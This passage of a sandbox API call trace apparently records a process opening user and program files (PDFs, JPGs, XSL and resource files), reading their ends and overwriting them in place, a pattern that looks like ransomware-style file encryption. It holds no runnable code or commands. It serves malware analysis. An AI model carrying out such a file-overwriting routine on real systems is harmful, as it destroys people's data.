lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0065.488] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x25254 [0065.489] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0065.489] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x25254 [0065.490] WriteFile (in: hFile=0x1cc, lpBuffer=0x28930e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28930e8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.490] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0065.490] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0065.490] CloseHandle (hObject=0x1cc) returned 1 [0065.494] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\faces.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0065.494] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.494] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x80f5 [0065.494] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.494] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.495] ReleaseMutex (hMutex=0x168) returned 1 [0065.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0065.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Faces.pdf", lpUsedDefaultChar=0x0) returned 9 [0065.495] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0065.497] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x70f5 [0065.497] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0065.498] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x70f5 [0065.498] WriteFile (in: hFile=0x1cc, lpBuffer=0x28930e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28930e8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.498] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0065.498] WriteFile (in: hFile=0x1cc, lpBuffer=0x28930e8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28930e8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.498] CloseHandle (hObject=0x1cc) returned 1 [0065.500] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0065.500] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.500] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xb189 [0065.500] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.500] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.500] ReleaseMutex (hMutex=0x168) returned 1 [0065.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0065.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0065.501] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0065.503] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xa189 [0065.504] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0065.504] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xa189 [0065.504] WriteFile (in: hFile=0x1cc, lpBuffer=0x28930e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28930e8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.504] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0065.504] WriteFile (in: hFile=0x1cc, lpBuffer=0x28930e8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28930e8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.504] CloseHandle (hObject=0x1cc) returned 1 [0065.506] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0065.506] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.507] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1906 [0065.507] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.507] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.507] ReleaseMutex (hMutex=0x168) returned 1 [0065.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GreenBubbles.jpg", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0065.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GreenBubbles.jpg", cchWideChar=16, lpMultiByteStr=0x1f88bcc, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GreenBubbles.jpg", lpUsedDefaultChar=0x0) returned 16 [0065.507] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x1906, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2fdf2bc*=0x1906, lpOverlapped=0x0) returned 1 [0065.510] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0065.511] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1e8e, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2fdf2d0*=0x1e8e, lpOverlapped=0x0) returned 1 [0065.511] CloseHandle (hObject=0x1cc) returned 1 [0065.516] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aglW_t4lWSRUs3lvnOF.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\aglw_t4lwsrus3lvnof.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0065.516] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.516] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x18edb [0065.516] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.516] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.516] ReleaseMutex (hMutex=0x168) returned 1 [0065.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="aglW_t4lWSRUs3lvnOF.jpg", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0065.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="aglW_t4lWSRUs3lvnOF.jpg", cchWideChar=23, lpMultiByteStr=0x1f88bcc, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aglW_t4lWSRUs3lvnOF.jpg", lpUsedDefaultChar=0x0) returned 23 [0065.517] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0065.518] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x17edb [0065.518] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0065.518] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x17edb [0065.518] WriteFile (in: hFile=0x1cc, lpBuffer=0x28930e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28930e8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.519] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0065.519] WriteFile (in: hFile=0x1cc, lpBuffer=0x28930e8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28930e8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.519] CloseHandle (hObject=0x1cc) returned 1 [0065.524] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0065.525] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.525] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x18ed [0065.525] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.525] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.526] ReleaseMutex (hMutex=0x168) returned 1 [0065.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OrangeCircles.jpg", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0065.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OrangeCircles.jpg", cchWideChar=17, lpMultiByteStr=0x1f88bcc, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OrangeCircles.jpg", lpUsedDefaultChar=0x0) returned 17 [0065.526] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x18ed, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2fdf2bc*=0x18ed, lpOverlapped=0x0) returned 1 [0065.729] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0065.730] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea92b8*, nNumberOfBytesToWrite=0x1e75, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea92b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x1e75, lpOverlapped=0x0) returned 1 [0065.730] CloseHandle (hObject=0x1cc) returned 1 [0065.732] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.026] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0066.026] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x91554 [0066.026] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0066.026] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.026] ReleaseMutex (hMutex=0x168) returned 1 [0066.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hydrangeas.jpg", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0066.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hydrangeas.jpg", cchWideChar=14, lpMultiByteStr=0x1f7344c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hydrangeas.jpg", lpUsedDefaultChar=0x0) returned 14 [0066.027] ReadFile (in: hFile=0x1fc, lpBuffer=0x2874088, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0066.030] ReadFile (in: hFile=0x1fc, lpBuffer=0x2874088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0066.031] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x90554 [0066.031] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0066.035] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x90554 [0066.036] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0066.036] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0066.036] WriteFile (in: hFile=0x1fc, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0066.036] WriteFile (in: hFile=0x1fc, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0066.036] CloseHandle (hObject=0x1fc) returned 1 [0066.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.047] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0066.047] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4932 [0066.048] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0066.048] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.048] ReleaseMutex (hMutex=0x168) returned 1 [0066.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="as90.xsl", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0066.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="as90.xsl", cchWideChar=8, lpMultiByteStr=0x1f733cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="as90.xsl", lpUsedDefaultChar=0x0) returned 8 [0066.048] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0066.050] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3932 [0066.050] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0066.050] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3932 [0066.051] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0066.051] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0066.051] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0066.051] CloseHandle (hObject=0x1fc) returned 1 [0066.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.053] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0066.053] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x3a18 [0066.053] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0066.053] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.053] ReleaseMutex (hMutex=0x168) returned 1 [0066.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msolui100.rll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0066.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msolui100.rll", cchWideChar=13, lpMultiByteStr=0x1f7358c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 